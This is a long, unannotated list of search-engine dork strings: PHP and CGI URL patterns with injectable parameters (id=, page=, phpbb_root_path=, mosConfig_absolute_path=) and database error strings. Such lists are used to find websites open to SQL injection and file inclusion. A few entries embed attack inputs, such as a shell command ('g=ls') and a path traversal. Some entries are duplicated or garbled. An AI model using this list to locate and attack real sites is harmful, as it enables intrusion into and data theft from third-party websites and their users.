“id=” & intext:”Warning: array_merge() “id=” & intext:”Warning: preg_match() “id=” & intext:”Warning: ilesize() “id=” & intext:”Warning: filesize() index.php?id= buy.php?category= article.php?ID= play_old.php?id= newsitem.php?num= top10.php?cat= historialeer.php?num= reagir.php?num= Stray-Questions-View.php?num= forum_bds.php?num= game.php?id= view_product.php?id= sw_comment.php?id= news.php?id= avd_start.php?avd= event.php?id= sql.php?id= news_view.php?id= select_biblio.php?id= humor.php?id= ogl_inet.php?ogl_id= fiche_spectacle.php?id= communique_detail.php?id= sem.php3?id= kategorie.php4?id= faq2.php?id= show_an.php?id= preview.php?id= loadpsb.php?id= opinions.php?id= spr.php?id= announce.php?id= participant.php?id= download.php?id= main.php?id= review.php?id= chappies.php?id= read.php?id= prod_detail.php?id= article.php?id= person.php?id= productinfo.php?id= showimg.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= rub.php?idr= view_faq.php?id= artikelinfo.php?id= detail.php?ID= index.php?= profile_view.php?id= category.php?id= publications.php?id= fellows.php?id= downloads_info.php?id= prod_info.php?id= shop.php?do=part&id= collectionitem.php?id= band_info.php?id= product.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= viewshowdetail.php?id= clubpage.php?id= memberInfo.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= tradeCategory.php?id= product_ranges_view.php?ID= shop_category.php?id= transcript.php?id= channel_id= item_id= newsid= trainers.php?id= news-full.php?id= news_display.php?getid= index2.php?option= readnews.php?id= newsone.php?id= product-item.php?id= pages.php?id= clanek.php4?id= viewapp.php?id= viewphoto.php?id= galeri_info.php?l= iniziativa.php?in= curriculum.php?id= labels.php?id= story.php?id= look.php?ID= aboutbook.php?id= “id=” & intext:”Warning: mysql_fetch_assoc() “id=” & intext:”Warning: is_writable() “id=” & 
intext:”Warning: Unknown() “id=” & intext:”Warning: mysql_result() “id=” & intext:”Warning: pg_exec() “id=” & intext:”Warning: require() buy.php?category= pageid= page.php?file= show.php?id= newsitem.php?num= readnews.php?id= top10.php?cat= reagir.php?num= Stray-Questions-View.php?num= forum_bds.php?num= game.php?id= view_product.php?id= sw_comment.php?id= news.php?id= avd_start.php?avd= event.php?id= sql.php?id= select_biblio.php?id= ogl_inet.php?ogl_id= fiche_spectacle.php?id= kategorie.php4?id= faq2.php?id= show_an.php?id= loadpsb.php?id= announce.php?id= participant.php?id= download.php?id= article.php?id= person.php?id= productinfo.php?id= showimg.php?id= rub.php?idr= view_faq.php?id= artikelinfo.php?id= index.php?= profile_view.php?id= category.php?id= fellows.php?id= downloads_info.php?id= prod_info.php?id= shop.php?do=part&id= collectionitem.php?id= band_info.php?id= product.php?id= viewshowdetail.php?id= clubpage.php?id= memberInfo.php?id= tradeCategory.php?id= transcript.php?id= item_id= news-full.php?id= aboutbook.php?id= preview.php?id= material.php?id= read.php?id= viewapp.php?id= story.php?id= newsone.php?id= rubp.php?idr= art.php?idm= title.php?id= index1.php?modo= include.php?*[*]*= nota.php?pollname= index3.php?p= padrao.php?pre= home.php?pa= main.php?type= sitio.php?start= *.php?include= general.php?xlink= show.php?go= nota.php?ki= down*.php?oldal= layout.php?disp= enter.php?chapter= base.php?incl= enter.php?mod= show.php?corpo= head.php?*[*]*= info.php?strona= template.php?str= main.php?doshow= view.php?*[*]*= index.php?to= page.php?cmd= view.php?b= info.php?option= show.php?x= template.php?texto= index3.php?ir= print.php?chapter= file.php?inc= file.php?cont= view.php?cmd= include.php?chapter= path.php?my= principal.php?param= general.php?menue= index1.php?b= info.php?chapter= nota.php?chapter= general.php?include= start.php?addr= index1.php?qry= index1.php?loc= page.php?addr= index1.php?dir= principal.php?pr= press.php?seite= head.php?cmd= 
home.php?sec= home.php?category= standard.php?cmd= mod*.php?thispage= base.php?to= view.php?choix= base.php?panel= template.php?mod= info.php?j= blank.php?pref= sub*.php?channel= standard.php?in= general.php?cmd= pagina.php?panel= template.php?where= path.php?channel= gery.php?seccion= page.php?tipo= sitio.php?rub= pagina.php?u= file.php?ir= *inc*.php?sivu= path.php?start= page.php?chapter= home.php?recipe= enter.php?pname= layout.php?path= print.php?open= mod*.php?channel= down*.php?phpbb_root_path= *inc*.php?str= gery.php?phpbb_root_path= include.php?middlePart= sub*.php?destino= info.php?read= home.php?sp= main.php?strona= sitio.php?get= sitio.php?index= index3.php?option= enter.php?a= main.php?second= print.php?pname= blank.php?itemnav= blank.php?pagina= index1.php?d= down*.php?where= *inc*.php?include= path.php?pre= home.php?loader= start.php?eval= index.php?disp= head.php?mod= sitio.php?section= nota.php?doshow= home.php?seite= home.php?a= page.php?url= pagina.php?left= layout.php?c= principal.php?goto= standard.php?base_dir= home.php?where= page.php?sivu= *inc*.php?adresa= padrao.php?str= include.php?my= show.php?home= index.php?load= index3.php?rub= sub*.php?str= start.php?index= nota.php?mod= sub*.php?mid= index1.php?*[*]*= pagina.php?oldal= padrao.php?loc= padrao.php?rub= page.php?incl= gery.php?disp= nota.php?oldal= include.php?u= principal.php?pagina= print.php?choix= head.php?filepath= include.php?corpo= sub*.php?action= head.php?pname= press.php?dir= show.php?xlink= file.php?left= nota.php?destino= general.php?module= index3.php?redirect= down*.php?param= default.php?ki= padrao.php?h= padrao.php?read= mod*.php?cont= index1.php?l= down*.php?pr= gery.php?viewpage= template.php?load= nota.php?pr= padrao.php?destino= index2.php?channel= principal.php?opcion= start.php?str= press.php?*[*]*= index.php?ev= pagina.php?pre= nota.php?content= include.php?adresa= sitio.php?t= index.php?sivu= principal.php?q= path.php?ev= print.php?module= index.php?loc= 
nota.php?basepath= padrao.php?tipo= index2.php?in= principal.php?eval= file.php?qry= info.php?t= enter.php?play= general.php?var= principal.php?s= standard.php?pagina= standard.php?subject= base.php?second= head.php?inc= pagina.php?basepath= main.php?pname= *inc*.php?modo= include.php?goto= file.php?pg= head.php?g= general.php?header= start.php?*root*= enter.php?pref= index3.php?open= start.php?module= main.php?load= enter.php?pg= padrao.php?redirect= pagina.php?my= gery.php?pre= enter.php?w= info.php?texto= enter.php?open= base.php?rub= gery.php?*[*]*= include.php?cmd= standard.php?dir= layout.php?page= index3.php?pageweb= include.php?numero= path.php?destino= index3.php?home= default.php?seite= path.php?eval= base.php?choix= template.php?cont= info.php?pagina= default.php?x= default.php?option= gery.php?ki= down*.php?second= blank.php?path= pagina.php?v= file.php?pollname= index3.php?var= layout.php?goto= pagina.php?incl= home.php?action= include.php?oldal= print.php?left= print.php?u= nota.php?v= home.php?str= press.php?panel= page.php?mod= default.php?param= down*.php?texto= mod*.php?dir= view.php?where= blank.php?subject= path.php?play= base.php?l= index2.php?rub= general.php?opcion= layout.php?xlink= padrao.php?name= pagina.php?nivel= default.php?oldal= template.php?k= main.php?chapter= layout.php?chapter= layout.php?incl= include.php?url= base.php?sivu= index.php?link= sub*.php?cont= info.php?oldal= general.php?rub= default.php?str= head.php?ev= sub*.php?path= view.php?page= main.php?j= index2.php?basepath= gery.php?qry= main.php?url= default.php?incl= show.php?redirect= index1.php?pre= general.php?base_dir= start.php?in= show.php?abre= index1.php?home= home.php?ev= index2.php?ki= base.php?pag= default.php?ir= general.php?qry= index2.php?home= press.php?nivel= enter.php?pr= blank.php?loader= start.php?cmd= padrao.php?d= sitio.php?recipe= principal.php?read= standard.php?showpage= main.php?pg= page.php?panel= press.php?addr= template.php?s= main.php?tipo= 
*inc*.php?ev= padrao.php?page= show.php?thispage= home.php?secao= main.php?start= enter.php?mid= press.php?id= main.php?inc= index3.php?cmd= index.php?pname= press.php?subject= include.php?sec= index3.php?xlink= general.php?texto= index3.php?go= index.php?cmd= index3.php?disp= index3.php?left= sub*.php?middle= show.php?modo= index1.php?pagina= head.php?left= enter.php?phpbb_root_path= show.php?z= start.php?basepath= blank.php?strona= template.php?y= page.php?where= layout.php?category= index1.php?my= principal.php?phpbb_root_path= nota.php?channel= page.php?choix= start.php?xlink= home.php?k= standard.php?phpbb_root_path= principal.php?middlePart= mod*.php?m= index.php?recipe= template.php?path= pagina.php?dir= sitio.php?abre= index1.php?recipe= blank.php?page= sub*.php?category= *inc*.php?bOdy= enter.php?middle= home.php?path= down*.php?pre= base.php?w= main.php?path= nota.php?ir= press.php?link= gery.php?pollname= down*.php?open= down*.php?pageweb= default.php?eval= view.php?showpage= show.php?get= sitio.php?tipo= layout.php?cont= default.php?destino= padrao.php?seccion= down*.php?r= main.php?param= standard.php?e= down*.php?in= nota.php?include= sitio.php?secao= print.php?my= general.php?abre= general.php?link= default.php?id= standard.php?panel= show.php?channel= enter.php?r= index3.php?phpbb_root_path= gery.php?where= head.php?middle= sub*.php?load= gery.php?sp= show.php?chapter= sub*.php?b= general.php?adresa= print.php?goto= sub*.php?sp= template.php?doshow= padrao.php?base_dir= index2.php?my= include.php?w= start.php?op= main.php?section= view.php?header= layout.php?menue= head.php?y= sub*.php?content= show.php?type= base.php?id= mod*.php?qry= default.php?strona= sitio.php?chapter= gery.php?index= nota.php?h= page.php?oldal= enter.php?panel= blank.php?t= start.php?pollname= sub*.php?module= enter.php?thispage= mod*.php?index= sitio.php?r= sub*.php?play= index2.php?doshow= index2.php?chapter= show.php?path= gery.php?to= info.php?base_dir= gery.php?abre= 
gery.php?pag= view.php?channel= default.php?mod= index.php?op= general.php?pre= padrao.php?type= template.php?pag= standard.php?pre= blank.php?ref= down*.php?z= general.php?inc= home.php?read= pagina.php?section= default.php?basepath= index.php?pre= sitio.php?pageweb= base.php?seite= *inc*.php?j= index2.php?filepath= file.php?type= index1.php?oldal= index2.php?second= index3.php?sekce= info.php?filepath= base.php?opcion= path.php?category= index3.php?start= start.php?rub= *inc*.php?i= blank.php?pre= general.php?channel= index2.php?OpenPage= page.php?section= mod*.php?middle= index1.php?goFile= blank.php?action= principal.php?loader= sub*.php?op= main.php?addr= start.php?mid= gery.php?secao= pagina.php?tipo= index.php?w= head.php?where= principal.php?tipo= press.php?loader= gery.php?showpage= gery.php?go= enter.php?start= press.php?lang= general.php?p= index.php?sekce= index2.php?get= sitio.php?go= include.php?cont= sub*.php?where= index3.php?index= path.php?recipe= info.php?loader= print.php?sp= page.php?phpbb_root_path= path.php?bOdy= principal.php?menue= print.php?cont= pagina.php?z= default.php?mid= blank.php?xlink= sub*.php?oldal= general.php?b= include.php?left= print.php?sivu= press.php?OpenPage= default.php?cont= general.php?pollname= template.php?nivel= enter.php?page= file.php?middle= standard.php?str= gery.php?get= main.php?v= down*.php?subject= enter.php?sivu= path.php?option= index.php?strona= index1.php?choix= index2.php?f= press.php?destino= pagina.php?channel= principal.php?b= home.php?include= head.php?numero= general.php?ref= main.php?dir= gery.php?cont= principal.php?type= file.php?param= default.php?secao= path.php?pageweb= info.php?r= base.php?phpbb_root_path= main.php?itemnav= view.php?pg= pagina.php?choix= default.php?itemnav= index2.php?cmd= layout.php?url= index.php?path= index1.php?second= start.php?modo= index1.php?get= index3.php?my= sub*.php?left= print.php?inc= view.php?type= path.php?*[*]*= base.php?adresa= index3.php?oldal= 
standard.php?bOdy= base.php?path= principal.php?strona= info.php?l= template.php?left= head.php?loc= page.php?ir= print.php?path= down*.php?path= sitio.php?opcion= pagina.php?category= press.php?menu= index2.php?pref= sitio.php?incl= show.php?ki= index3.php?x= page.php?strona= *inc*.php?open= index3.php?secao= standard.php?*[*]*= template.php?basepath= standard.php?goFile= index2.php?ir= file.php?modo= gery.php?itemnav= main.php?oldal= down*.php?showpage= start.php?destino= blank.php?rub= path.php?ir= layout.php?var= index1.php?texto= start.php?pg= index1.php?showpage= info.php?go= path.php?load= index3.php?abre= blank.php?where= info.php?start= page.php?secao= nota.php?pag= nota.php?second= index2.php?to= standard.php?name= start.php?strona= mod*.php?numero= press.php?home= info.php?z= mod*.php?path= blank.php?base_dir= base.php?texto= nota.php?secc= index.php?tipo= index.php?goto= print.php?pag= view.php?secao= general.php?strona= show.php?my= page.php?e= padrao.php?index= gery.php?thispage= start.php?base_dir= default.php?tipo= gery.php?panel= standard.php?ev= standard.php?destino= general.php?middle= main.php?basepath= standard.php?q= index1.php?tipo= mod*.php?choix= template.php?ir= show.php?adresa= general.php?mid= index3.php?adresa= pagina.php?sec= template.php?secao= home.php?w= general.php?content= sub*.php?recipe= main.php?category= enter.php?viewpage= main.php?ir= show.php?pageweb= principal.php?ir= default.php?pageweb= index.php?oldal= head.php?d= gery.php?mid= index.php?type= standard.php?j= show.php?oldal= enter.php?link= enter.php?content= blank.php?filepath= standard.php?channel= base.php?*[*]*= info.php?incl= down*.php?include= press.php?modo= file.php?choix= press.php?type= blank.php?goto= index3.php?showpage= principal.php?subject= start.php?chapter= show.php?r= pagina.php?thispage= general.php?chapter= page.php?base_dir= page.php?qry= show.php?incl= page.php?*[*]*= main.php?h= file.php?seccion= default.php?pre= principal.php?index= 
principal.php?inc= home.php?z= pagina.php?in= show.php?play= nota.php?subject= default.php?secc= default.php?loader= padrao.php?var= mod*.php?b= default.php?showpage= press.php?channel= pagina.php?ev= sitio.php?name= page.php?option= press.php?mid= down*.php?corpo= view.php?get= print.php?thispage= principal.php?home= show.php?param= standard.php?sivu= index3.php?panel= include.php?play= path.php?cmd= file.php?sp= template.php?section= view.php?str= blank.php?left= nota.php?lang= path.php?sivu= main.php?e= default.php?ref= start.php?seite= default.php?inc= print.php?disp= home.php?h= principal.php?loc= index3.php?sp= gery.php?var= sub*.php?base_dir= path.php?middle= pagina.php?str= base.php?play= base.php?v= sitio.php?sivu= main.php?r= file.php?nivel= start.php?sivu= template.php?c= general.php?second= sub*.php?mod= home.php?loc= head.php?corpo= standard.php?op= index2.php?inc= info.php?pref= base.php?basepath= print.php?basepath= *inc*.php?m= base.php?home= layout.php?strona= padrao.php?url= sitio.php?oldal= pagina.php?read= index1.php?go= standard.php?s= page.php?eval= index.php?j= pagina.php?pr= start.php?secao= template.php?*[*]*= nota.php?get= index3.php?link= home.php?e= gery.php?name= nota.php?eval= sub*.php?abre= index2.php?load= principal.php?in= view.php?load= mod*.php?action= default.php?p= head.php?c= template.php?viewpage= view.php?mid= padrao.php?addr= view.php?go= file.php?basepath= home.php?pre= include.php?goFile= layout.php?play= index1.php?subject= info.php?middlePart= down*.php?pg= sub*.php?bOdy= index.php?option= sub*.php?chapter= default.php?t= head.php?opcion= nota.php?panel= sitio.php?left= show.php?include= pagina.php?start= head.php?choix= index3.php?tipo= index3.php?choix= down*.php?channel= base.php?pa= nota.php?sekce= show.php?l= show.php?index= blank.php?url= start.php?thispage= nota.php?play= show.php?second= enter.php?include= principal.php?middle= main.php?where= padrao.php?link= path.php?strona= index3.php?read= mod*.php?module= 
standard.php?viewpage= standard.php?pr= *inc*.php?showpage= pagina.php?ref= path.php?pname= padrao.php?mid= info.php?eval= include.php?path= page.php?subject= sub*.php?qry= head.php?module= nota.php?opcion= head.php?abre= base.php?str= home.php?bOdy= gery.php?module= head.php?sivu= page.php?inc= pagina.php?header= mod*.php?v= home.php?doshow= ======================================================================================================================================================================================================= padrao.php?n= index1.php?chapter= padrao.php?basepath= index.php?r= index3.php?seccion= sitio.php?mid= index.php?where= general.php?type= pagina.php?goto= page.php?pa= default.php?menue= main.php?goto= index1.php?abre= info.php?seccion= index2.php?pa= layout.php?pageweb= nota.php?disp= index1.php?bOdy= default.php?nivel= show.php?header= down*.php?pag= start.php?tipo= standard.php?w= index.php?open= blank.php?menu= general.php?nivel= padrao.php?nivel= *inc*.php?addr= index.php?var= home.php?redirect= *inc*.php?link= *inc*.php?incl= padrao.php?corpo= down*.php?url= enter.php?goto= down*.php?addr= sub*.php?j= principal.php?f= sub*.php?menue= index2.php?section= general.php?my= head.php?loader= general.php?goto= include.php?dir= start.php?header= blank.php?in= base.php?name= nota.php?goFile= head.php?base_dir= mod*.php?recipe= press.php?pr= padrao.php?*[*]*= layout.php?opcion= print.php?rub= index.php?pr= general.php?seite= pagina.php?numero= *inc*.php?pg= nota.php?rub= view.php?seite= pagina.php?recipe= index.php?pref= page.php?action= page.php?ev= show.php?ir= head.php?index= mod*.php?pname= view.php?ir= *inc*.php?start= principal.php?rub= principal.php?corpo= padrao.php?middle= base.php?pname= template.php?header= view.php?sp= main.php?name= nota.php?m= blank.php?open= head.php?dir= page.php?pname= *inc*.php?k= index.php?pollname= head.php?oldal= index1.php?str= template.php?choix= down*.php?pollname= page.php?recipe= 
template.php?corpo= nota.php?sec= info.php?*[*]*= sub*.php?*[*]*= page.php?q= index1.php?type= gery.php?y= standard.php?lang= gery.php?page= index.php?action= press.php?pname= down*.php?v= index3.php?second= show.php?recipe= main.php?pre= file.php?numero= print.php?str= standard.php?link= nota.php?OpenPage= view.php?pollname= print.php?l= index.php?go= standard.php?numero= view.php?pr= down*.php?read= down*.php?action= index1.php?OpenPage= principal.php?left= mod*.php?start= file.php?bOdy= gery.php?pg= blank.php?qry= base.php?eval= default.php?left= gery.php?param= blank.php?pa= nota.php?b= path.php?loader= start.php?o= include.php?include= nota.php?corpo= enter.php?second= sub*.php?pname= mod*.php?pageweb= principal.php?addr= standard.php?action= template.php?lang= include.php?basepath= sub*.php?ir= down*.php?nivel= path.php?opcion= print.php?category= print.php?menu= layout.php?secao= template.php?param= standard.php?ref= base.php?include= blank.php?bOdy= path.php?pref= print.php?g= padrao.php?subject= nota.php?modo= index3.php?loader= template.php?seite= general.php?pageweb= index2.php?param= path.php?nivel= page.php?pref= press.php?pref= enter.php?ev= standard.php?middle= index2.php?recipe= blank.php?dir= home.php?pageweb= view.php?panel= down*.php?home= head.php?ir= mod*.php?ir= show.php?pagina= default.php?base_dir= show.php?loader= path.php?mid= blank.php?abre= down*.php?choix= info.php?opcion= page.php?loader= principal.php?oldal= index1.php?load= home.php?content= pagina.php?sekce= file.php?n= include.php?redirect= print.php?itemnav= enter.php?index= print.php?middle= sitio.php?goFile= head.php?include= enter.php?e= index.php?play= enter.php?id= view.php?mod= show.php?nivel= file.php?channel= layout.php?choix= info.php?bOdy= include.php?go= index3.php?nivel= sub*.php?include= path.php?numero= principal.php?header= main.php?opcion= enter.php?s= sub*.php?pre= include.php?index= gery.php?pageweb= padrao.php?path= info.php?url= press.php?ev= index1.php?pg= 
print.php?in= general.php?modo= head.php?ki= press.php?my= index1.php?pollname= principal.php?to= default.php?play= page.php?g= nota.php?pg= blank.php?destino= blank.php?z= ======================================================================================================================================================================================================= *default.php?page= *default.php?bOdy= *index.php?url= *index.php?arquivo= index.php?include= index.php?visualizar= index.php?pagina= index.php?page= index.php?p= index.php?cont= index.php?x= index.php?cat= index.php?site= index.php?configFile= index.php?do= index2.php?x= Index.php?id= template.php?pagina inc/step_one_tables.php?server_inc= GradeMap/index.php?page= admin.php?cal_dir= path_of_cpcommerce/_functions.php?prefix= contacts.php?cal_dir= convert-date.php?cal_dir= album_portal.php?phpbb_root_path= mainfile.php?MAIN_PATH= dotproject/modules/files/index_table.php?root_dir= gery/init.php?HTTP_POST_VARS= pm/lib.inc.php?pm_path= ideabox/include.php?gorumDir= cgi-bin/index.cgi?page= cgi-bin/awstats.pl?update=1&logfile= cgi-bin/awstats/awstats.pl?configdir cgi-bin/ikonboard.cgi cgi-bin/acart/acart.pl?&page= cgi-bin/quikstore.cgi?category= cgi-bin/ubb/ubb.cgi?g= cgi-bin/hinsts.pl? 
cgi-bin/bp/bp-lib.pl?g= ccbill/whereami.cgi?g=ls cgi-bin/telnet.cgi cgi-bin/1/cmd.cgi calendar.pl?command=login&fromTemplate= encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file= events.cgi?t= powerup.cgi?a=latest&t= lc.cgi?a= news.cgi?a=114&t= biznews.cgi?a=33&t= jobs.cgi?a=9&t= articles.cgi?a=34&t= events.cgi?a=155&t= latinbitz.cgi?t= newsdesk.cgi?t= media.cgi?a=11&t= reporter.cgi?t= news.cgi?t= newsupdate.cgi?a=latest&t= deportes.cgi?a=latest&t= news.cgi?a=latest&t= whereami.cgi?g=id auktion.pl?menue= i-m/i-m.cgi?p= vote.pl?action=show&id= shop.pl/page= newsdesk.cgi?a=latest&t= fileseek.cgi?head=&foot= cgi-bin/probe.cgi?olddat= emsgb/easymsgb.pl?print= app/webeditor/login.cgi?username=&command=simple&do=edit&passwor d=&file= csv_db/csv_db.cgi?fil e=file.extention cgi-bin/jammail.pl?job=showoldmail&mail= cgi-bin/bbs/read.cgi?file= support_page.cgi?file_name= index.php?include= index.php?open= index.php?visualizar= main.php?x= main.php?page= index.php?meio.php= index.php?page= index.php?action= index5.php?configFile= index5.php?page= index5.php?content= index5.php?x= index5.php?open= index5.php?m= index5.php?site= index5.php?cat= index.php?d= index.php?a= index.php?b= index.php?c= index.php?e= index.php?f= index.php?g= index.php?h= index.php?i= index.php?j= index.php?k= index.php?l= index.php?m= index.php?n= index.php?o= index.php?p= index.php?q= index.php?r= index.php?s= index.php?t= index.php?u= index.php?v= index.php?x= index.php?y= index.php?z= index.php?loc= index.php?seite= index2.php?d= index2.php?a= index.php?ir= index.php?secao= index2.php?b= index2.php?c= index2.php?e= index2.php?f= index2.php?g= index2.php?h= index2.php?i= index2.php?j= index2.php?k= index2.php?l= index2.php?m= index2.php?n= index2.php?o= index2.php?p= index2.php?q= index2.php?r= index2.php?s= index2.php?t= index2.php?u= index2.php?v= index2.php?x= index2.php?y= index2.php?z= index5.php?inc= index5.php?pg= index5.php?lv1= index.php?sub= index.php?sub2= index.php?pg= 
index.php?lv1= index.php?directfile= index.php?funcion= index.php?ll= index.php?lnk= index5.php?main= index5.php?include= index5.php?root= index5.php?pagina= index.php?theme= index.php?acao= index5.php?cont= index5.php?pag= index5.php?p= index5.php?lang= index5.php?language= template.php?pagina= llindex.php?sub= index2.php?pg= index2.php?lv1= index2.php?sub= index2.php?directfile= index2.php?funcion= index2.php?sub2= index2.php?ll= index2.php?lnk= index5.php?bOdy= index5.php?visualizar= index5.php?do= index2.php?theme= index2.php?acao= index2hp?aa= index3hp?aa= index.php?server= index.php?cal= index.php?prefix= index.php?root_PATH= index.php?path= index.php?gorumdir= index2.php?cont= index2.php?server= index2.php?cal= index2.php?prefix= index2.php?root_PATH= index2.php?path= AKI exibir.php?abre= exibir.php?page= exibir.php?get= exibir.php?p= exibir.php?lang= index2.php?gorumdir= index2.php?pag= index2.php?lang= index2.php?language= index2.php?content= index.php?middle= step_one_tables.php?server_inc= grademade/index.php?page= phpshop/index.php?base_dir= admin.php?cal_dir= _functions.php?prefix= contacts.php?cal_dir= convert-date.php?cal_dir= album_portal.php?phpbb_root_path= mainfile.php?MAIN_PATH= index_table.php?root_dir= affich.php?base= init.php?HTTP_POST_VARS= lib.inc.php?pm_path= include.php?gorumDir= start_lobby.php?CONFIG[MWCHAT_Libs]= index.php?configFile= module_db.php?pivot_path= index.php?lng=../../include/main.inc&G_PATH= initdb.php?absolute_path= step_one.php?server_inc= pipe.php?HCL_path= write.php?dir= new-visitor.inc.php?lvc_include_dir= header.php?systempath= theme.php?THEME_DIR= index.php?pageurl= expanded.php?conf= addevent.inc.php?agendax_path= Packages.php?sourcedir= _functions.php?prefix addedit.php?root_dir= view.php?root_dir= vw_files.php?root_dir= viewgantt.php?root_dir= displayCategory.php?basepath= default/theme.php?THEME_DIR= upgrade_album.php?GERY_BASEDIR= init.inc.php?CPG_M_DIR= mod_mainmenu.php?mosConfig_absolute_path= 
editor.php?root= lib.php?root= secure_img_render.php?p= default.php?page= arquivo.php?data= word.php?id= mod.php?mod= index.php?plugin= sendpage.php?page= index.php?hl= modules.php?op= index.php?templateid= article.php?sid= .php?my=” .php?a=” .php?f=” .php?z=” .php?zo=” .php?la=” .php?perm=” .php?item_id=” .php?f_content=” .php?from=” .php?mid=” .php?lest=” .php?east=” .gov.br/index.php?arquivo= index.php?ver= /contenido/classes/class.inuse.php news.php?CONFIG[script_path]= index.php?vpagina= index.php?arq= index.php?pg_ID= index.php?pg= home.php?page= */newbb/print.php?forum=*topic_id=*” */newbb_plus/*=” */news/archive.php?op=*year=*month=*” .php?abrir=” .php?act=” .php?action=” .php?ad=” .php?archive=” .php?area=” .php?article=” .php?b=” */tsep/include/colorswitch.php?tsep_config[absPath]=*” .php?back=” .php?base=” .php?basedir=” .php?bbs=” .php?board_no=” .php?bOdy=” .php?c=” .php?cal_dir=” .php?cat=” /include/init.inc.php?CPG_M_DIR=” /includes/mx_functions_ch.php?phpbb_root_path=” /modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=” .php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=” .php?subd=” .php?subdir=” .php?category=” .php?choice=” .php?class=” .php?club_id=” .php?cod.tipo=” .php?cod=” .php?conf=” .php?configFile=” .php?cont=” .php?corpo=” .php?cvsroot=” .php?d=” .php?da=” .php?date=” .php?debug=” .php?debut=” .php?default=” .php?destino=” .php?dir=” .php?display=” .php?file_id=” .php?file=” .php?filepath=” .php?flash=” .php?folder=” .php?for=” .php?form=” .php?formatword=” .php?funcao=” .php?function=” .php?g=” .php?get=” .php?go=” .php?gorumDir=” .php?goto=” .php?h=” .php?headline=” .php?i=” .php?inc=” .php?include=” .php?includedir=” .php?inter=” .php?itemid=” .php?j=” .php?join=” .php?jojo=” .php?l=” .php?lan=” .php?lang=” .php?link=” .php?load=” .php?loc=” .php?m=” .php?main=” .php?meio.php=” .php?meio=” .php?menu=” .php?menuID=” .php?mep=” .php?month=” .php?mostra=” .php?n=” .php?name=” .php?nav=” 
.php?new=” .php?news=” .php?next=” .php?nextpage=” .php?o=” .php?op=” .php?open=” .php?option=” .php?origem=” .php?Page_ID=” .php?pageurl=” .php?para=” .php?part=” .php?pg=” .php?pid=” .php?place=” .php?play=” .php?plugin=” .php?pm_path=” .php?pollname=” .php?post=” .php?pr=” .php?prefix=” .php?prefixo=” .php?q=” .php?redirect=” .php?ref=” .php?refid=” .php?regionId=” .php?release_id=” .php?release=” .php?return=” .php?root=” .php?S=” .php?searchcode_id=” .php?sec=” .php?secao=” .php?sect=” .php?sel=” .php?server=” .php?servico=” .php?sg=” .php?shard=” .php?show=” .php?sid=” .php?site=” .php?sourcedir=” .php?start=” .php?storyid=” .php?str=” .php?subject=” .php?sufixo=” .php?systempath=” .php?t=” .php?task=” .php?teste=” .php?theme_dir=” .php?thread_id=” .php?tid=” .php?title=” .php?to=” .php?topic_id=” .php?type=” .php?u=” .php?url=” .php?urlFrom=” .php?v=” .php?var=” .php?vi=” .php?view=” .php?visual=” .php?wPage=” .php?y=” include/new-visitor.inc.php?lvc_include_dir= includes/header.php?systempath= support/mailling/maillist/inc/initdb.php?absolute_path= coppercop/theme.php?THEME_DIR= becommunity/community/index.php?pageurl= shoutbox/expanded.php?conf= agendax/addevent.inc.php?agendax_path= myPHPCalendar/admin.php?cal_dir= yabbse/Sources/Packages.php?sourcedir= zboard/zboard.php path_of_cpcommerce/_functions.php?prefix dotproject/modules/tasks/viewgantt.php?root_dir= My_eGery/public/displayCategory.php?basepath= modules/My_eGery/public/displayCategory.php?basepath= modules/4nAlbum/public/displayCategory.php?basepath= modules/coppermine/themes/default/theme.php?THEME_DIR= modules/agendax/addevent.inc.php?agendax_path= modules/xoopsgery/upgrade_album.php?GERY_BASEDIR= modules/xgery/upgrade_album.php?GERY_BASEDIR= modules/coppermine/include/init.inc.php?CPG_M_DIR= modules/mod_mainmenu.php?mosConfig_absolute_path= pivot/modules/module_db.php?pivot_path= library/editor/editor.php?root= library/lib.php?root= e107/e107_handlers/secure_img_render.php?p= main.php?x= 
main.php?page= *default.php?page= *default.php?bOdy= default.php?page= *index.php?url= *index.php?arquivo= index.php?meio.php= index.php?include= index.php?open= index.php?visualizar= index.php?pagina= index.php?inc= index.php?page= index.php?pag= index.php?p= index.php?content= index.php?cont= index.php?c= index.php?meio= index.php?x= index.php?cat= index.php?site= index.php?configFile= index.php?action= index.php?do= index2.php?x= Index.php?id= index2.php?content= template.php?pagina inc/step_one_tables.php?server_inc= phpshop/index.php?base_dir= admin.php?cal_dir= path_of_cpcommerce/_functions.php?prefix= contacts.php?cal_dir= convert-date.php?cal_dir= album_portal.php?phpbb_root_path= mainfile.php?MAIN_PATH= dotproject/modules/files/index_table.php?root_dir= html/affich.php?base= gery/init.php?HTTP_POST_VARS= pm/lib.inc.php?pm_path= ideabox/include.php?gorumDir= modules/tasks/viewgantt.php?root_dir= cgi-bin/index.cgi?page= cgi-bin/awstats.pl?update=1&logfile= cgi-bin/awstats/awstats.pl?configdir cgi-bin/ikonboard.cgi cgi-bin/acart/acart.pl?&page= cgi-bin/quikstore.cgi?category= cgi-bin/ubb/ubb.cgi?g= cgi-bin/hinsts.pl? 
cgi-bin/bp/bp-lib.pl?g= ccbill/whereami.cgi?g=ls cgi-bin/telnet.cgi cgi-bin/1/cmd.cgi encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file= cgi-sys/guestbook.cgi?user=cpanel&template= account.php?action= account.php?action= account.php?action= iurl:”account.php?action=” account.php?action= iurl:”.php?action=” account.php?action= .php?action= accounts.php?command= .php?command=” addmedia.php?factsfile[$LANGUAGE]= phpGedView .php?p=” announcements.php?phpraid_dir= “phpraid” announcements.php?phpraid_dir= “phpraid signup” announcements.php?phpraid_dir= php raid announcements.php?phpraid_dir= phpraid announcements.php?phpraid_dir= phpraid signup arg.php?arg= .php?arg= args.php?arg= .php?arg= atom.php5?page= .php5?id= auto.php?inc= .php?inc=” auto.php?page= auto.php?page= base.php?f1= base.php?f1=” base.php?f1= .php?f1=” board.php?see= board.php?see=” board.php?see= .php?see=” book.php5?page= php5?page= /calendar.php?l= calendar.php?l=” /calendar.php?l= calendar.php?l= /calendar.php?p= calendar.php?p=” /calendar.php?p= calendar.php?p= /calendar.php?pg= calendar.php?pg=” /calendar.php?pg= calendar.php?pg= /calendar.php?s= calendar.php?s=” 